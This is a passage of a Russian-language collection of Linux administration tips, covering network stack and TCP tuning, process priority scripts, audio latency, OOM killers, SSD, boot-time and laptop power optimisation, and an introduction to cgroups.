DMA до этого тайм-аута / количества кадров Почему: сокращение использования CPUs, аппаратных IRQ, может увеличить пропускную способность за счет задержки. Как: Команда проверки: ethtool -c ethX Как изменить: ethtool -C ethX rx-usecs value tx-usecs value Как мониторить: cat /proc/interrupts Объединение прерываний (soft IRQ) и управления сетевыми очередями QDisc входящих пакетов (ingress). Что: максимальное число микросекунд в одном NAPI (https://en.wikipedia.org/wiki/New_API) цикле опроса. Опрос завершится когда, либо `netdev_budget_usecs` истечёт по временя цикла опроса или количество обработанных пакетов достигнет `netdev_budget`. Почему: вместо того чтобы обрабатывать кучу softIRQ, драйвер сохраняет данные в пуле (polling data); следите за состояниями `dropped` (число пакетов, отброшенных из-за того, что `netdev_max_backlog` был превышен) и `squeezed` (число раз когда ksoftirq превысил `netdev_budget`). Как: Команда проверки: sysctl net.core.netdev_budget_usecs Как изменить: sysctl -w net.core.netdev_budget_usecs value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_budget` максимальное количество пакетов, взятых со всех интерфейсов за один цикл опроса (NAPI poll). В одном цикле опроса интерфейсы, которые зарегистрированы для опроса, зондируются круговым способом. Кроме того, цикл опроса не может превышать `netdev_budget_usecs` микросекунд, даже если `netdev_budget` не был исчерпан. Как: Команда проверки: sysctl net.core.netdev_budget Как изменить: sysctl -w net.core.netdev_budget value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `dev_weight` максимальное количество пакетов, которое ядро может обработать при прерывании NAPI, это переменная для каждого процессора. Для драйверов, которые поддерживают LRO или GRO_HW, аппаратно агрегированный пакет считается в этом пакете одним. Как: Команда проверки: sysctl net.core.dev_weight Как изменить: sysctl -w net.core.dev_weight value Как мониторить: cat /proc/net/softnet_stat или скриптом. Что: `netdev_max_backlog` максимальное количество пакетов, находящихся в очереди на стороне INPUT (входной qdisc_), когда интерфейс получает пакеты быстрее, чем ядро может их обработать. Как: Команда проверки: sysctl net.core.netdev_max_backlog Как изменить: sysctl -w net.core.netdev_max_backlog value Как мониторить: cat /proc/net/softnet_stat или скриптом. Исходящие QDisc - txqueuelen (длина очереди tx) и default_qdisc Что: `txqueuelen` максимальное количество пакетов, поставленных в очередь на стороне вывода. Почему: buffer/queue появление разрывов соединений, а также примением контроля трафика tc (traffic control). Как: Команда проверки: ifconfig ethX Как изменить: ifconfig ethX txqueuelen value Как мониторить: ip -s link Что: `default_qdisc` дисциплина очереди по умолчанию, используемая для сетевых устройств. Почему: Каждое приложение имеет разную нагрузку и требует контроля трафика, оно также используется для борьбы с излишней сетевой буферизацией bufferbloat. Как: Команда проверки: sysctl net.core.default_qdisc Как изменить: sysctl -w net.core.default_qdisc value Как мониторить: tc -s qdisc ls dev ethX Буферы/очереди чтения и записи (TCP Read and Write Buffers/Queues) Что: `tcp_rmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - максимальный размер приёмного буфера TCP. Почему: буфер/очередь приложения для записи/отправки данных. Понять последствия может помочь статья https://blog.cloudflare.com/the-story-of-one-latency-spike/ Как: Команда проверки: sysctl net.ipv4.tcp_rmem Как изменить: sysctl -w net.ipv4.tcp_rmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_wmem` - min (минимальный размер доступный при создании сокета), default (начальный размер), max (максимальный размер) - размер буфера отправки, используемого сокетами TCP. Как: Команда проверки: sysctl net.ipv4.tcp_wmem Как изменить: sysctl -w net.ipv4.tcp_wmem="min default max" когда меняете значение по умолчанию, не забудьте перезагрузить приложения в пользовательском окружении (т.е. ваш веб-сервер, nginx, и т.п.) Как мониторить: cat /proc/net/sockstat Что: `tcp_moderate_rcvbuf` - если установлено, TCP выполняет автонастройку приёмного буфера, пытаясь автоматически определить размер буфера. Как: Команда проверки: sysctl net.ipv4.tcp_moderate_rcvbuf Как изменить: sysctl -w net.ipv4.tcp_moderate_rcvbuf value Как мониторить: cat /proc/net/sockstat TCP FSM и алгоритм перегрузки (Honorable mentions - TCP FSM and congestion algorithm)
`sysctl net.core.somaxconn` - обеспечивает верхний предел значения параметра backlog, передаваемого в функцию `listen()` (https://eklitzke.org/how-tcp-sockets-work), известный пользователям как `SOMAXCONN`. Если вы меняете это значение, вы также должны изменить в своём приложении совместимые значения (т.е. nginx backlog).
`cat /proc/sys/net/ipv4/tcp_fin_timeout` - указывает количество секунд ожидания окончательного пакета FIN, прежде чем сокет будет принудительно закрыт. Это строго является нарушением спецификации TCP, но требуется для предотвращения атак типа "отказ в обслуживании".
`cat /proc/sys/net/ipv4/tcp_available_congestion_control` - показывает доступные варианты управления перегрузкой, которые зарегистрированы.
`cat /proc/sys/net/ipv4/tcp_congestion_control` - устанавливает алгоритм управления перегрузкой, используемое для новых соединений.
`cat /proc/sys/net/ipv4/tcp_max_syn_backlog` - задаёт максимальное число запросов подключения в очереди, которые еще не получили подтверждения от подключающегося клиента; если это число будет превышено, ядро начнёт отбрасывать запросы.
`cat /proc/sys/net/ipv4/tcp_syncookies` - включён/выключен [syn cookies](https://en.wikipedia.org/wiki/SYN_cookies), полезен для защиты от syn flood атак (https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/).
`cat /proc/sys/net/ipv4/tcp_slow_start_after_idle` - включён/выключен медленный старт tcp. Как мониторить: общая сводка netstat -atn | awk '/tcp/ {print $6}' | sort | uniq -c счётчики по определённому состоянию: `established`, `syn-sent`, `syn-recv`, `fin-wait-1`, `fin-wait-2`, `time-wait`, `closed`, `close-wait`, `last-ack`, `listening`, `closing`: ss -neopt state time-wait | wc -l` tcp статистика netstat -st более читаемая tcp статистика nstat -a обобщённая статистика сокетов cat /proc/net/sockstat детальная статистика, описание полей смотрите: https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt cat /proc/net/tcp `ListenOverflows` и `ListenDrops` - важные поля для наблюдения cat /proc/net/netstat читаемый вариант /proc/net/netstat (https://sa-chernomor.livejournal.com/9858.html) cat /proc/net/netstat | awk '(f==0) { i=1; while ( i<=NF) {n[i] = $i; i++ }; f=1; next} \ (f==1){ i=2; while ( i<=NF){ printf "%s = %d\n", n[i], $i; i++}; f=0} ' | grep -v "= 0 Источник: https://commons.wikimedia.or/wiki/File:Tcp_state_diagram_fixed_new.svg Сетевые утилиты для тестирования и мониторинга
iperf3 (https://iperf.fr/) - пропускная способность сети
vegeta (https://github.com/tsenart/vegeta) - нагрузочное тестирование HTTP
netdata (https://github.com/firehol/netdata) - система распределённого мониторинга производительности и работоспособности в реальном времени Рекомендации
https://www.kernel.org/doc/Documentation/sysctl/net.txt
https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt
https://www.kernel.org/doc/Documentation/networking/scaling.txt
https://www.kernel.org/doc/Documentation/networking/proc_net_tcp.txt
https://www.kernel.org/doc/Documentation/networking/multiqueue.txt
http://man7.org/linux/man-pages/man7/tcp.7.html
http://man7.org/linux/man-pages/man8/tc.8.html
http://www.ece.virginia.edu/cheetah/documents/papers/TCPlinux.pdf
https://netdevconf.org/1.2/papers/bbr-netdev-1.2.new.new.pdf
https://blog.cloudflare.com/how-to-receive-a-million-packets/
https://blog.cloudflare.com/how-to-achieve-low-latency/
https://blog.packagecloud.io/eng/2016/06/22/monitoring-tuning-linux-networking-stack-receiving-data/
https://www.youtube.com/watch?v=6Fl1rsxk4JQ
https://oxnz.github.io/2016/05/03/performance-tuning-networking/
https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/xl710-x710-performance-tuning-linux-guide.pdf
https://access.redhat.com/sites/default/files/attachments/20150325_network_performance_tuning.pdf
https://medium.com/@matteocroce/linux-and-freebsd-networking-cbadcdb15ddd
https://blogs.technet.microsoft.com/networking/2009/08/12/where-do-resets-come-from-no-the-stork-does-not-bring-them/
https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/multi-core-processor-based-linux-paper.pdf
http://syuu.dokukino.com/2013/05/linux-kernel-features-for-high-speed.html
https://www.bufferbloat.net/projects/codel/wiki/Best_practices_for_benchmarking_Codel_and_FQ_Codel/
https://software.intel.com/en-us/articles/setting-up-intel-ethernet-flow-director
https://courses.engr.illinois.edu/cs423/sp2014/Lectures/LinuxDriver.pdf
https://www.coverfire.com/articles/queueing-in-the-linux-network-stack/
http://vger.kernel.org/~davem/skb.html
https://www.missoulapubliclibrary.org/ftp/LinuxJournal/LJ13-07.pdf
https://opensourceforu.com/2016/10/network-performance-monitoring/
https://www.yumpu.com/en/document/view/55400902/an-adventure-of-analysis-and-optimisation-of-the-linux-networking-stack
https://lwn.net/Articles/616241/
https://medium.com/@duhroach/tools-to-profile-networking-performance-3141870d5233
https://www.lmax.com/blog/staff-blogs/2016/05/06/navigating-linux-kernel-network-stack-receive-path/
https://es.net/host-tuning/100g-tuning/
http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm
http://veithen.github.io/2014/01/01/how-tcp-backlog-works-in-linux.html
https://people.cs.clemson.edu/~westall/853/tcpperf.pdf
http://tldp.org/HOWTO/Traffic-Control-HOWTO/classless-qdiscs.html
https://es.net/assets/Papers-and-Publications/100G-Tuning-TechEx2016.tierney.pdf
https://www.kernel.org/doc/ols/2009/ols2009-pages-169-184.pdf
https://devcentral.f5.com/articles/the-send-buffer-in-depth-21845
http://packetbomb.com/understanding-throughput-and-tcp-windows/
https://www.speedguide.net/bdp.php
https://www.switch.ch/network/tools/tcp_throughput/
https://www.ibm.com/support/knowledgecenter/en/SSQPD3_2.6.0/com.ibm.wllm.doc/usingethtoolrates.html
https://blog.tsunanet.net/2011/03/out-of-socket-memory.html
https://unix.stackexchange.com/questions/12985/how-to-check-rx-ring-max-backlog-and-max-syn-backlog-size
https://serverfault.com/questions/498245/how-to-reduce-number-of-time-wait-processes
https://unix.stackexchange.com/questions/419518/how-to-tell-how-much-memory-tcp-buffers-are-actually-using
https://eklitzke.org/how-tcp-sockets-work
https://www.linux.com/learn/intro-to-linux/2017/7/introduction-ss-command
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
https://loicpefferkorn.net/2016/03/linux-network-metrics-why-you-should-use-nstat-instead-of-netstat/
http://assimilationsystems.com/2015/12/29/bufferbloat-network-best-practice/

Запуск процесса с совсем-совсем IDLE приоритетом в Linux Автор: СеменСемныч777 [комментарии]

Скрипт для запуска процесса в Linux с минимальным влиянием на работу других процессов: #!/bin/sh # куда бы еще /usr/bin/nice впихнуть? /usr/bin/chrt --idle 0 /usr/bin/ionice -c 3 $* & XPID=$! /usr/bin/cpulimit -l 1 -c 1 -b -p $XPID wait $XPID В chrt "--idle 0" выставляет режим планировщика SCHED_IDLE с минимальным приоритетом. В ionice "-c 3" активирует 3 класс (idle) планирования ввода/вывода. В cpulimit опцией "-l" задаётся допустимый процент использования CPU (в диапазоне от 0 до 100 * на число процессорных ядер), - "-c" ограничивает число ядер CPU, "-b" - запускает процесс cpulimit в фоне, "-p" применяет ограничение для PID уже запущенного процесса. При помощи опции "-i" можно распространить ограничение и на все дочерние процессы. Вариант в форме однострочника: /usr/bin/cpulimit -l 1 -c 1 -f -q -- /usr/bin/nice -19 /usr/bin/chrt --idle 0 /usr/bin/ionice -c 3 $*

Гитара в Debian и борьба с XRUN Автор: Павел Отредиез [комментарии]

Опыт настройки Debian для повышения качества обработки звука с электрогитары. У меня достаточно средняя конфигурация: Athlon X3 3.4 GHz и дешевая USB звуковая карта Behringer UFO202 (лучше бы Behringer UCA222). Из софта использую qjackctl + jackd, guitarix, rakarrack. Надо сказать, что guitarix прожорливее на первый взгляд, чем rakarrack, хотя в обоих случаях потребление ресурсов зависит от навороченности эффектов. Итак чего я добился: ни одного XRUN (переполнение звукового буфера) при запуске jackd: /usr/bin/jackd -dalsa -dhw:CODEC -r48000 -p256 -n2 Что позволяет играть без артефактов с почти незаметной задержкой. Для этого: 1. И самое важное. Заметил что cpufreq гувернер ondemand всё равно через минуту две начинает снижать частоту ядер процессора и проскакивают единичные XRUN. Поэтому наш выбор гувернер performance (у меня 3 ядра): cpufreq-set -c 0 -g performance cpufreq-set -c 1 -g performance cpufreq-set -c 2 -g performance 2. Также советую nice. В debian приведем файл /etc/security/limits.d/audio.conf к виду: @audio - rtprio 95 @audio - memlock unlimited @audio - nice -19 Обратите внимание последняя строчка была по умолчанию закоментирована. Добавим себя в группу audio если нет: gpasswd -a user audio Средствами qjackctl приоритет меньше 0 не выставляется. Мы сделаем -19. Для этого в свойствах ярлыков на панели запуска программ поменяем команды запуска типа: nice -n -19 qjackctl nice -n -19 guitarix nice -n -19 rakarrack Дочерние процессы наследуют приоритет.

Сравнение работающих в пространстве пользователя обработчиков нехватки памяти (доп. ссылка 1) Автор: кек [комментарии]

earlyoom https://github.com/rfjakob/earlyoom Простой, лёгкий, стабильный. VmRSS меньше мегабайта, нагрузка на процессор околонулевая. С релиза 1.3 стал очень надёжен (исправлено возможное убийство невиновных). Лучший выбор для домохозяек, которым не нужны лишние настройки, а нужна хорошая работа из коробки. Поддержка PSI обсуждается (https://github.com/rfjakob/earlyoom/issues/100 - автор давно собирался добавить поддержку PSI, но в последнее время засомневался в целесообразности этого. Проводятся работы по убеждению сенсея в необходимости добавления поддержки PSI). Присутствует в репозиториях Fedora, Ubuntu 18.04+ и Debian 10+. Начиная с версии 1.3 могу смело рекомендовать его в качестве дефолтного киллера для десктопа. Начиная с версии 1.3 могу смело рекомендовать его в качестве применяемого по умолчанию oom-killer для десктопа. Будет [[https://pagure.io/fedora-workstation/issue/119 включён[[ в Fedora 32 Workstation по умолчанию. nohang https://github.com/hakavlad/nohang Явная и очень гибкая конфигурация. Десятки параметров настройки в конфиге. Подробная печать свойств завершаемого процесса. Печать таблицы процессов со свойствами всех процессов перед корректирующим действием. Возможность реакции на PSI (pressure stall information, https://lwn.net/Articles/759658/) с выбором произвольной метрики и сигруппы для мониторинга. Возможность кастомизации корректирующих действий: отправка жертве любого сигнала (помимо SIGTERM/SIGKILL) или выполнение произвольной команды. Возможность тонкого влияния на badness процесса путем сопоставления его name, cmdline, cgroup, exe realpath c заданным регулярным выражением. Уведомления о низком уровне памяти (произвольной командой или через notify-send). Подготовлены пакеты для Fedora и CentOS 7. Минусы: мало документации. Хочу релизнуться, но лень писать документацию. Можно рекомендовать тем, кому не хватает возможностей earlyoom (у последнего нет поддержки PSI и уведомлений о нехватке памяти). oomd https://github.com/facebookincubator/oomd Работает только с сигруппами - минимальным объектом для корректирующего действия является сигруппа. Это означает, что при применении на десктопе oomd убъёт всю сессию посредством SIGKILL. В связи с этим рекомендуется только для крупных высоконагруженных серверов. Плюс требования: работает только с systemd, cgroup2 должна быть единственной иерархией, иерархия cgroup_v1 должна быть отключена + требуется ядро с поддержкой PSI + своп должен быть включен (без свопа oomd бесполезен). Плюс oomd заметно грузит CPU - нагрузка в 4.5% в порядке вещей (We see this internally too. Something like 4.5% of a core all the time. - https://github.com/facebookincubator/oomd/issues/79#issuecomment-520615498 ). Модульная архитектура, но издержки описаны выше. Пакеты сформированы только для Fedora. low-memory-monitor https://gitlab.freedesktop.org/hadess/low-memory-monitor/ Рано делать выводы. Идея просить процессы умерить аппетиты самостоятельно вызывает скепсис. В остальном этот киллер примитивен и не содержит других киллер-фич. Итог Если у вас CentOS 6, или слабое железо, или не нужно ничего лишнего, или хочется "быстро поставить и забыть" - ставьте earlyoom. Nohang имеет дополнительные возможности, полезные как для десктопа, так и для сервера. oomd лучше не трогать, если сам не из Фейсбука.

Оптимизация работы на SSD-накопителе рабочей станции с Fedora Linux (доп. ссылка 1) [комментарии]

Включаем для SSD-накопителя поддержку TRIM и отключаем обновление метаданных со временем доступа к файлу. Добавляем в список флагов /etc/fstab опции discard и noatime: /dev/mapper/fedora-root / ext4 noatime,discard 1 1 /dev/mapper/fedora-home /home ext4 noatime,discard 1 2 Организуем хранение содержимого временной директории в памяти, в /etc/fstab включаем tmpfs для /tmp: none /tmp tmpfs nodev,nosuid,mode=1777 0 0 По аналогии можно создать хранимый в памяти раздел и для логов. Содержимое логов будет сбрасываться при перезагрузке, но для десктоп-систем потеря логов, как правило, не критична. none /var/log tmpfs size=20m 0 0 Отключаем кэширование страниц Firefox на диске. В about:config меняем содержимое переменной browser.cache.disk.enable на false и указываем приемлемый размер кэша в ОЗУ через переменную browser.cache.memory.capacity (65536 для 64 Мб). Включаем режим обратного кэширования записи для SSD-диска (дополнительно кэширование следует включить в BIOS ноутбука) и заменяем планировщик ввода/вывода на вариант, оптимизированный для Flash-памяти. Устанавливаем утилиту hdparm: sudo yum install hdparm Создаём файл /etc/rc.local и прописываем в него: #!/bin/sh hdparm -W1 /dev/sda echo noop > /sys/block/sdb/queue/scheduler где, /dev/sda - SSD-накопитель. sudo chmod +x /etc/rc.local Активируем сервис для запуска /etc/rc.local в systemd: systemctl enable rc-local.service

Сокращение времени загрузки Fedora 17 c 15 до 3 секунд (доп. ссылка 1) [комментарии]

Изложенные в данной статье инструкции позволяют сократить до трёх секунд загрузку дистрибутива Fedora 17 с NetworkManager до экрана приглашения входа в систему от GDM. Указанная конфигурация опробована на ноутбуке Lenovo T420s (2x2x Intel Core i5-2540M CPU @ 2.60GHz) и SSD-накопителем Intel SSDSA2BW160G3L. 1. Используем простейшую конфигурацию разбиения диска с загрузочным и рабочим разделами с файловой системой Ext4: sda1 ext4 /boot sda2 swap sda3 ext4 / После установки дистрибутива потребуется как минимум две перезагрузки для достижения оптимального времени загрузки из-за необходимости адаптации к загрузочной последовательности механизма readahead (вначале readahead собирает информацию о загружаемых программах и библиотеках, после чего начнёт разом загружать компоненты в кэш страниц памяти). Обновляем все пакеты, активируем prelink и устанавливаем пакет systemd-analyze: sudo yum update sudo /etc/cron.daily/prelink sudo yum install systemd-analyze После перезагрузки выполняем: sudo systemd-analyze Startup finished in 1413ms (kernel) + 2911ms (initramfs) + 10593ms (userspace) = 14918ms Как видим в штатном режиме дистрибутив загрузился за 15 секунд. Начинаем оптимизацию. Отключаем initramfs - так как в ядро встроена поддержка файловой системы ext4, поэтому для монтирования корневого раздела не требуется загрузка дополнительных модулей ядра. В параметрах загрузки явно указываем имя корневого раздела (без UUID) и тип ФС. Содержимое /etc/grub2.cfg должно выглядеть примерно так: linux /vmlinuz-3.3.7-1.fc17.x86_64 root=/dev/sda3 rootfstype=ext4 quiet libahci.ignore_sss=1 raid=noautodetect # initrd /initramfs-3.3.7-1.fc17.x86_64.img Опции "raid=noautodetect" и "libahci.ignore_sss=1" позволяют ускорить время инициализации ядра из-за пропуска дополнительных проверок. После перезагрузки systemd-analyze показывает сокращение времени до 14684ms. Продолжаем оптимизацию. Так как на компьютере не используются LVM, RAID и шифрование можно смело отключить все сервисы fedora-*storage*. Дополнительно можно отключить систему вывода заставки plymouth, так как нам важнее скорость а не эстетическое наслаждение от ожидания завершения загрузки. Для отключения указанных сервисов следует использовать команду "systemctl mask", достоинство которой ещё и в том, что %post скрипт RPM в дальнейшем не включит сервис автоматически. cd /lib/systemd/system for i in fedora*storage* plymouth-*.* lvm2-monitor.* mdmonitor*.*; do sudo systemctl mask $i;done Одновременно отключим лишние SysV-скрипты livesys, livesys-late и spice-vdagentd: for i in livesys livesys-late spice-vdagentd ; do sudo chkconfig $i off;done Перезагружаем систему и наблюдаем через systemd-analyze сокращение времени загрузки до 8197ms Далее переходим к экстремальным действиям и отключаем все сервисы, кроме NetworkManager, поэтому важно запомнить что именно было отключено, так как в результате будет получена система без почты, межсетевого экрана, системы печати, утилит abrt, avahi, некоторых точек монтирования, rsyslog, irqbalance и защиты selinux. cd /lib/systemd/system for i in abrt*.service auditd.service avahi-daemon.* bluetooth.* dev-hugepages.mount dev-mqueue.mount \\ fedora-configure.service fedora-loadmodules.service fedora-readonly.service ip6tables.service \\ iptables.service irqbalance.service mcelog.service rsyslog.service sendmail.service sm-client.service \\ sys-kernel-config.mount sys-kernel-debug.mount; do \\ sudo systemctl mask $i; \\ done Для отключения selinux правим файл /etc/selinux/config и добавляем настройку "selinux=0" в строку с параметрами ядра. Настройки /etc/grub2.cfg принимают примерно такой вид: linux /vmlinuz-3.3.7-1.fc17.x86_64 root=/dev/sda3 rootfstype=ext4 libahci.ignore_sss=1 raid=noautodetect selinux=0 # initrd /initramfs-3.3.7-1.fc17.x86_64.img Перезагружаемся и наблюдаем по systemd-analyze сокращение загрузки до 2926ms. Но идеи по оптимизации пока не исчерпаны. Попробует выжать ещё времени через манипуляции с монтированием разделов. Переводим раздел /boot в режим "монтирование по требованию" и создаём раздел /tmp с использованием tmpfs для сокращения нагрузки на диск в процессе загрузки. В результате /etc/fstab будет выглядеть следующим образом: /dev/sda3 / ext4 defaults 1 1 /dev/sda1 /boot ext4 noauto,comment=systemd.automount 1 2 /dev/sda2 swap swap defaults 0 0 tmpfs /tmp tmpfs defaults 0 0 После перезагрузки systemd-analyze выдаёт 2769ms. Так как NetworkManager запускается также при старте программы входа в систему, можно отключить приводящую к загрузке NetworkManagers зависимость на уровне multi-user, так как он всё равно будет параллельно запущен при запуске gdm, зависимость для которого остаётся. sudo rm /etc/systemd/system/multi-user.target.wants/NetworkManager.service Проверяем время загрузки - 2603ms. Для проверки насколько readahead влияет на время загрузки для эксперимента временно выключим readahead: cd /lib/systemd/system for i in *readahead*; do sudo systemctl mask $i;done После перезагрузки systemd-analyze показывает 2547ms. Но несмотря на сокращение времени загрузки до запуска экрана входа в систему, сам э кран визуально появляется с некоторой задержкой. Для того чтобы более точно оценить время загрузки воспользуемся секундомером. sudo dracut -f Время загрузки с readahead и возвращённым initramfs: systemd-analyze Startup finished in 803ms (kernel) + 2217ms (initramfs) + 1018ms (userspace) = 4039ms При сборке initramfs без plymouth и в режиме только хоста: sudo dracut -f -H -o plymouth получаем: systemd-analyze Startup finished in 612ms (kernel) + 499ms (initramfs) + 1330ms (userspace) = 2443ms Следует иметь в виде, что сервисы отключенные через "systemctl mask" при необходимости можно в любой момент вернуть командой "systemctl unmask".

Советы по увеличению автономной работы ноутбука с Debian/Ubuntu (доп. ссылка 1) (доп. ссылка 2) [комментарии]

1. Включение ALPM позволит сэкономить 1-2 Вт энергии, но может привести к повреждению данных для некоторых устройств. echo SATA_ALPM_ENABLE=true | sudo tee /etc/pm/config.d/sata_alpm 2. Изменение фона рабочего стола на более светлый цвет для ноутбука с LCD-экраном увеличит продолжительность работы примерно на 1%. 3. Включение режима энергосбережения RC6 для видеокарт Intel i915 через передачу параметра ядра i915.i915_enable_rc6=1 позволит сэкономить 25-40% энергии для устройств на базе архитектуры Sandybridge, но в редких случаях может привести к зависанию на определённых ноутбуках. 4. Включение режима сжатия фреймбуфера (Frame Buffer Compression) для драйвера i915 через передачу параметра ядру i915.i915_enable_fbc=1 позволит сэкономить до 0.6 Вт. 5. Установка задержки гашения обратного хода луча вертикальной развёртки (DRM vblank off) через параметр ядра drm.vblankoffdelay=1 сократит число вызывающих пробуждение процессора событий (wakeup events) и возможно сэкономит немного энергии. 6. Отключение всех беспроводных подсистем, если они не используются. В частности отключение bluetooth ("blacklist bluetooth" в /etc/modprobe.d/blacklist.conf) приведёт к экономии 1-2 Вт. 7. Отключение web-камеры ("blacklist uvcvideo" в /etc/modprobe.d/blacklist.conf) поможет сэкономить 1-2 Вт. 8. Использование утилиты PowerTop для перевода следующих устройств в состояние экономного потребления энергии: * Webcam * Audio * DRAM * Ethernet * Wifi * Bluetooth * SATA * MMC/SD 9. Использование ядра Linux в котором решена проблема с активацией ASPM (Active State Power Management) для карт PCI Express. Ядро тестовой ветки Ubuntu 12.04 уже содержит нужный патч. Для других систем рекомендуется в качестве обходного пути передать ядру параметр "pcie_aspm=powersave", который по умолчанию активирует режим максимальной экономии энергии (иначе, будет использован режим максимальной производительности). Для некоторых моделей ноутбуков данное действие может привести к снижению энергопотребления на 10-30%. 10. Приглушение яркости экрана до 2/3 от максимального значения сэкономит 1 Вт. 11. Отключение мерцающего курсора в gnome-terminal позволит избавиться от лишних пробуждений процессора: gconftool-2 --type string --set /apps/gnome-terminal/profiles/Default/cursor_blink_mode off 12. Выявление проблем с излишне частым пробуждением процессора и излишней нагрузкой на CPU для часто используемых приложений при помощи пакета powertop или утилит eventstat и cpustat из PPA репозитория colin-king/powermanagement. Например для выявления наиболее активных событий за 10 секунд: sudo eventstat 10 1 Evnt/s PID Task Init Function Callback 96.10 12659 npviewer.bin hrtimer_start_range_ns hrtimer_wakeup 58.10 0 [kern sched] Load balancing tick tick_sched_timer 49.80 2026 alsa-source hrtimer_start_range_ns hrtimer_wakeup 49.30 2024 alsa-sink hrtimer_start_range_ns hrtimer_wakeup 47.20 0 kworker/0:0 hrtimer_start_range_ns tick_sched_timer Для мониторинга в течение 60 секунд и вывода процессов, генерирующих более 5 событий в секунду: sudo eventstat -t 5 60 1 Evnt/s PID Task Init Function Callback 54.00 2003 compiz hrtimer_start_range_ns hrtimer_wakeup 49.35 2024 alsa-sink hrtimer_start_range_ns hrtimer_wakeup 18.92 0 [kern sched] Load balancing tick tick_sched_timer 17.57 0 kworker/0:0 hrtimer_start_range_ns tick_sched_timer 16.13 0 [kern core] usb_hcd_poll_rh_status rh_timer_func 9.98 2386 gwibber-service hrtimer_start_range_ns hrtimer_wakeup 9.88 10063 desktopcouch-se hrtimer_start_range_ns hrtimer_wakeup 9.87 2382 ubuntuone-syncd hrtimer_start_range_ns hrtimer_wakeup 9.83 10109 desktopcouch-se hrtimer_start_range_ns hrtimer_wakeup 5.23 0 [kern core] hrtimer_start tick_sched_timer 12046 Total events, 200.77 events/sec

Управление ресурсами с помощью cgroups (доп. ссылка 1) (доп. ссылка 2) (доп. ссылка 3) Автор: Ivan Pogudin [комментарии]

Cgroups (Control Groups) - обеспечивают механизм для агрегирования множества задач и их будущих потомков в иерархические группы с определенным поведением. Так начинается документация посвященная cgroups поставляемая с ядром Linux. Собственно это и есть достаточно ёмкое описание технологии. Но конечно же его не достаточно. Небольшое отступление, необходимо привести конфигурацию программного обеспечения на которой выполнялись примеры - это ОС Debian GNU/Linux 6.0.1. Как правило новые технологии изучают либо в случае поиска инструментов необходимость в которых уже назрела, либо в качестве знакомства с инструментами и потенциальной возможности их дальнейшего применения. В первом случае ответ на вопрос "Для чего это нужно?" уже получен, во втором нет. Тем не менее я приведу ответ на этот вопрос. Cgroups - это технология обеспечивающая контроль за распределением различных ресурсов доступных операционной системе между группами процессов. Что это дает? Это дает возможность при высоких нагрузках распределять ресурсы по заранее заданным правилам между группами процессов. Плюс к этом существует возможность собирать статистику по потребленным ресурсам с помощью специальной подсистемы. Где это может применяться? В любой ситуации, где необходимо распределить ресурсы между конкурирующими процессами и в которой не хватает таких механизмов как nice и т.д. Какое описание технологии может обойтись без терминологии. Задача (task) - процесс ОС привязанный к определенной группе, все его потомки тоже будут наследовать привязку к группе родителя. Подсистема (subsystem) - это модуль, который позволяет использовать некоторые услуги для группу задач. Каждая подсистема может быть прикреплена только к одной иерархии. Настраиваемый параметр (tunable parameter) - это некая сущность(представлена файлом в виртуальной ФС cgroups) с помощью которой осуществляется взаимодействие с подсистемой. Иерархия групп (hierarchy) - это множество групп расположенных в виде дерева, так что каждая задача в системе находится точно в одной группе в иерархии и с заданным множеством(set) подсистем. Каждая группа имеет свои настраиваемые параметры, которые соответствуют множеству подсистем специфичному для данной иерархии. Пора переходить к практике. Как это не банально, но чтобы начать работать с cgroups необходимо установить приложения для userspace. aptitude install cgroup-bin Теперь всё готово, чтобы использовать cgroups. Есть несколько способов управлять cgroups: набор специфичных утилит, работа стандартными средствами с виртуальной ФС, из собственного программного обеспечения через библиотеку. Наиболее подходящий для первоначального знакомства это набор специфичных утилит. Конечно можно использовать и стандартные средства и взаимодействовать с системой через файлы в виртуальной ФС (echo, cat, mount, и т.д.) Небольшое отступление. Для того чтобы перейти к практике необходимо определить некую "сферическую задачу в вакууме". Такая задача будет звучать так: есть система с запущенными веб-контейнером Tomcat и СУБД PostgreSQL, необходимо чтобы в момент пиковой нагрузки вычислительные ресурсы CPU распределялись по заданным правила (Tomcat - 40%, PostgreSQL - 50%, оставшаяся система 10%). Как уже было упомянуто, есть несколько подходов в работе с cgroups. Мы будем использовать специфические утилиты. Для реализации текущей задачи необходимо построить иерархию групп, где можно будет настроить распределение вычислительных ресурсов CPU. Настройка иерархии осуществляется в файле /etc/cgconfig.conf (на самом деле её можно производить на запущенной системе, либо специфичными утилитами, либо стандартным походом с mount). Настройки из этого файла применяются при старте сервиса cgconfig. Это просто удобный способ восстанавливать иерархию cgroups после перезагрузки системы. Итак, конфигурация для текущей задачи выглядит следующим образом: group default { perm { task { uid = root; gid = root; } admin { uid = root; gid = root; } } cpu { cpu.shares = 10; } } group daemons/tomcat { perm { task { uid = root; gid = root; } admin { uid = root; gid = root; } } cpu { cpu.shares = 40; } } group daemons/postgres { perm { task { uid = root; gid = root; } admin { uid = root; gid = root; } } cpu { cpu.shares = 50; } } mount { cpu = /mnt/cgroups/cpu; cpuacct = /mnt/cgroups/cpu; } Секция mount описывает подключение двух подсистем cpu и cpuacct к иерархии /mnt/cgroups/cpu. Секции group настраивают конкретные группы для всей системы(sysdefault), tomcat и postgres. В данном случае задаются права для административных функций и добавления задач admin и task соответственно. Единственный настраиваемый параметр это cpu.shares из подсистемы cpu, который определяет долю вычислительных ресурсов CPU, которые достаются группе. Теперь можно перезапускать сервис cgconfig в /mnt/cgroups, должна быть следующая иерархия. /mnt/cgroups/ └── cpu ├── cgroup.procs ├── cpuacct.stat ├── cpuacct.usage ├── cpuacct.usage_percpu ├── cpu.shares ├── daemons │ ├── cgroup.procs │ ├── cpuacct.stat │ ├── cpuacct.usage │ ├── cpuacct.usage_percpu │ ├── cpu.shares │ ├── notify_on_release │ ├── postgres │ │ ├── cgroup.procs │ │ ├── cpuacct.stat │ │ ├── 